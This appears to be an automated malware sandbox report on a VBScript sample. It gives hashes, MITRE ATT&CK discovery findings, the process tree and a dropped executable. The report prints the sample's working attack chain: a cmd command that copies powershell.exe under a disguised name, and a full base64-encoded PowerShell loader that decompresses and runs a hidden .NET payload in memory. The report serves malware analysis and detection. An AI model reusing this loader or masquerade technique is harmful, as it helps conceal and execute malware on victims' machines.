c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd

Resubmissions

28-08-2024 22:22

240828-2al3mazana 10

28-08-2024 21:59

28-08-2024 21:42

28-08-2024 00:57

28-08-2024 00:53

27-08-2024 03:06

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
28-08-2024 00:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs
Size

2.0MB
MD5

3096f8476512077adacad2e66cd9535e
SHA1

8ddfbf4ea1bb26fecb75ff9482529060351f5c82
SHA256

c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd
SHA512

277c34f5300e6e4b2129dd8aae4e68c226dee549601d0fb12323d86588492ea810cbe9ffcecda66c7680f2af6e76a7d7532d7a09d1cd59d639980ae06ac5188f
SSDEEP

24576:9f5HNlz6GydnATwu6JRnDB/4G8jslVZCNct1hMYnnEhKEw7nmlLW+r1/YrK88skH:pNTmJT/QglCN07ir4f6MJk8nO

Score

10^/10

discovery

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2220 2528 cmd.exe
Executes dropped EXE 1 IoCs

Processes:

c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

pid process

2752 c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2220	2528	cmd.exe

pid	process
2752	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

pid process

2752 c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

description pid process

Token: SeDebugPrivilege 2752 c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

pid	process
2752	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

description	pid	process
Token: SeDebugPrivilege	2752	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 2944 wrote to memory of 2752	2944	WScript.exe	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
PID 2944 wrote to memory of 2752	2944	WScript.exe	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
PID 2944 wrote to memory of 2752	2944	WScript.exe	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
PID 2944 wrote to memory of 2752	2944	WScript.exe	c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2944
- C:\Users\Admin\AppData\Local\Temp\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe
  "C:\Users\Admin\AppData\Local\Temp\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe" -enc JABWAGwAbgBmAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAWQBiAGsAbwBhACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAVgBsAG4AZgByACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEYAZABqAGcAagAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABZAGIAawBvAGEALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEEAcABnAGoAcABqAGoAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEYAZABqAGcAagAgACkAOwAkAFcAdQB3AHUAaAB1AGMAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAWQBnAG8AeQBpAHYAZQBuAG4AbwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABBAHAAZwBqAHAAagBqACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABZAGcAbwB5AGkAdgBlAG4AbgBvAC4AQwBvAHAAeQBUAG8AKAAgACQAVwB1AHcAdQBoAHUAYwBoACAAKQA7ACQAWQBnAG8AeQBpAHYAZQBuAG4AbwAuAEMAbABvAHMAZQAoACkAOwAkAEEAcABnAGoAcABqAGoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABGAGQAagBnAGoAIAA9ACAAJABXAHUAdwB1AGgAdQBjAGgALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEYAZABqAGcAagApADsAIAAkAEMAaQB4AHoAbwBmACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARgBkAGoAZwBqACkAOwAgACQATABqAGoAdwBlAHIAZgBuAGcAIAA9ACAAJABDAGkAeAB6AG8AZgAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEwAagBqAHcAZQByAGYAbgBnAC4ARABlAGMAbABhAHIAaQBuAGcAVAB5AHAAZQAsACAAJABMAGoAagB3AGUAcgBmAG4AZwAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2752

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe" /Y
1⤵
- Process spawned unexpected child process
PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\c4b066fb890720e472c5620375ee0d24dddfb222a5c8384c8613e486ec38cbbd.vbs.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/2752-4-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download